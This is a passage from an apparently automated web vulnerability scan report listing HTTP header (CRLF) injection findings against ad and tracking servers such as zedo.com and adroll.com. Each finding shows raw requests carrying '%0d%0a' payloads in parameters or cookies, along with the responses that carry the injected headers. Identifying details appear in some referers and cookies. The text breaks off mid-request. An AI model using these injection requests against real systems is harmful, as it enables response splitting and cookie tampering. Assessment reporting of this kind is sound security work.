Set-Cookie: B3=89PS000000000St88qiu0000000002t68bvZ0000000001t689PT000000000.t87oaf0000000001t884fB0000000001t88fq40000000001t88fq50000000003t88bwx0000000001t48i440000000001t28mb20000000001t4852G0000000003sS82790000000002t57PrH0000000001t78fq70000000001t886Bm0000000001t67dNH0000000002sZ8qav0000000009td8j4q0000000001t67GHq0000000001s.84ZE0000000001t684ZF0000000002t67FCH0000000001s.8cVQ0000000001sV8nAl0000000002t682980000000001t384U10000000001t6852N0000000001s.8fq20000000003t88fq30000000002t86o.Q0000000001sY87ma0000000001s.8i430000000001t27gi30000000001sG8qaw0000000004tc852z0000000001sS8qay0000000001t7852A0000000001sS8n7e0000000002tb87H10000000001td; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Sat, 14-May-2011 20:33:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 14 Feb 2011 01:33:39 GMT
Connection: close
Content-Length: 2219

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2.39. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 7882f%0d%0adcb3cfdd72c was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=7882f%0d%0adcb3cfdd72c&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:7882f
dcb3cfdd72c
;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4228

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',7882f

...[SNIP]...

2.40. http://c7.zedo.com/utils/ecSet.js [v parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload cefd9%0d%0a310d8c3cc8d was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=cefd9%0d%0a310d8c3cc8d&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFad=0:0:0; FFcat=305,2942,9:305,4506,17:1120,1,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: cefd9
310d8c3cc8d
;expires=Wed, 16 Mar 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
X-Varnish: 1725802099
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=2283
Date: Mon, 14 Feb 2011 01:29:12 GMT
Connection: close



2.41. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 148bc%0d%0a00a581bb834 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/148bc%0d%0a00a581bb834/LJ7DC3I6ENDUDJRX7PVZRX?pv=1280671358.1085205&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Mon, 14 Feb 2011 14:35:08 GMT
Connection: keep-alive
Set-Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/148bc
00a581bb834
/LJ7DC3I6ENDUDJRX7PVZRX/DSTFX4IPGNDVXKJZOC5QMN.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.42. http://d.adroll.com/pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/DBLH4FNWEJG3HHKBYW3CFN/LJ7DC3I6ENDUDJRX7PVZRX

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 90fad%0d%0a5b0b82ad641 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/DBLH4FNWEJG3HHKBYW3CFN/90fad%0d%0a5b0b82ad641?pv=1280671358.1085205&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://aboutecho.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Mon, 14 Feb 2011 14:35:09 GMT
Connection: keep-alive
Set-Cookie: __adroll=7eac527dab8242660d6ce169dd8ca402; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/DBLH4FNWEJG3HHKBYW3CFN/90fad
5b0b82ad641
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.43. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload ae973%0d%0a0345b07197e was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=ae973%0d%0a0345b07197e&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:ae973
0345b07197e
;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',ae973
0345
...[SNIP]...

2.44. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 29b5a%0d%0ac4af126ee8c was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=29b5a%0d%0ac4af126ee8c&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:29b5a
c4af126ee8c
;expires=Mon, 14 Feb 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1;expires=Wed, 16 Mar 2011 01:15:00 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=59
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:15:00 GMT
Connection: close
Content-Length: 2099

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',29b5a
c4af
...[SNIP]...

2.45. http://dw.com.com/clear/c.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dw.com.com
Path:   /clear/c.gif

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload fcbbe%0d%0a18ae7dfebfb was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /clear/fcbbe%0d%0a18ae7dfebfb?ptid=8301&onid=503544&asid=20031629&astid=28&x_breadcrumb=250%3A503544&ts=1297647365150&sid=162&ld=www.cbsnews.com&oid=8301-503544_162-20031629&brflv=10.2.154&brwinsz=1112x1010&brscrsz=1920x1200&brlang=en-US&tcset=utf8&im=dwjs&srcUrl=http%3A%2F%2Fwww.cbsnews.com%2F8301-503544_162-20031629-503544.html&title=Mitch%20Daniels%3A%20Debt%20is%20the%20New%20%22Red%20Menace%22%20-%20Political%20Hotsheet%20-%20CBS%20News HTTP/1.1
Host: dw.com.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/8301-503544_162-20031629-503544.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 01:37:05 GMT
Server: Apache/2.0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, no-transform
Vary: *
Expires: Fri, 23 Jan 1970 12:12:12 GMT
Location: http://dw.cbsnews.com/clear/fcbbe
18ae7dfebfb
?ts=1297647425497435&clgf=Cg5iVU0qL2O/AAAAdRw
Content-Length: 0
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Content-Type: image/gif


2.46. http://live.activeconversion.com/webtracker/track2.html [avc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://live.activeconversion.com
Path:   /webtracker/track2.html

Issue detail

The value of the avc request parameter is copied into the Set-Cookie response header. The payload 6ab95%0d%0af1c7ac10bc3 was submitted in the avc parameter. This caused a response containing an injected HTTP header.

Request

GET /webtracker/track2.html?method=track&pid=30120&uclkt=1&alh=http%3A//mzima.net/&avc=6ab95%0d%0af1c7ac10bc3&source=&keyword=&ref=&pageTitle=PacketExchange%20-%20MZIMA%20-%20Global%20IP%20/%20Internet%20bandwidth%2C%20Peering%2C%20Content%20Delivery%20/%20CDN%2C%20Ethernet%20Private%20Line%20and%20Colocation%20/%20Datacenter%20Services&pageUrl=http%3A%2F%2Fmzima.net%2F&java=1&amcs=0.44739386485889554 HTTP/1.1
Host: live.activeconversion.com
Proxy-Connection: keep-alive
Referer: http://mzima.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _wt_31021=1296942871924|f64d-6178-34ed-5f2e12df7d201ca|0

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 14:37:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=B277C118513B36E9839C0F3995AFC9C6; Path=/webtracker
Set-Cookie: _wt_30120="1297694251289|6ab95
f1c7ac10bc3
|0"; Max-Age=630720000;Path=/; HttpOnly
P3P: policyref="http://www.activeconversion.com/w3c/p3p.xml", CP="NOI DSP LAW PSA OUR IND STA NAV COM"
Connection: close
Content-Type: image/png
Content-Length: 68


2.47. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload af142%0d%0ac17363f719d was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=ADG&si=12327&pi=-&xs=3&pu=http%253A//www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html%2523incart_mce%2526ifu%253D&v=5.5&cb=25687 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.nola.com/crime/index.ssf/2011/02/new_orleans_pizza_delivery_man.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
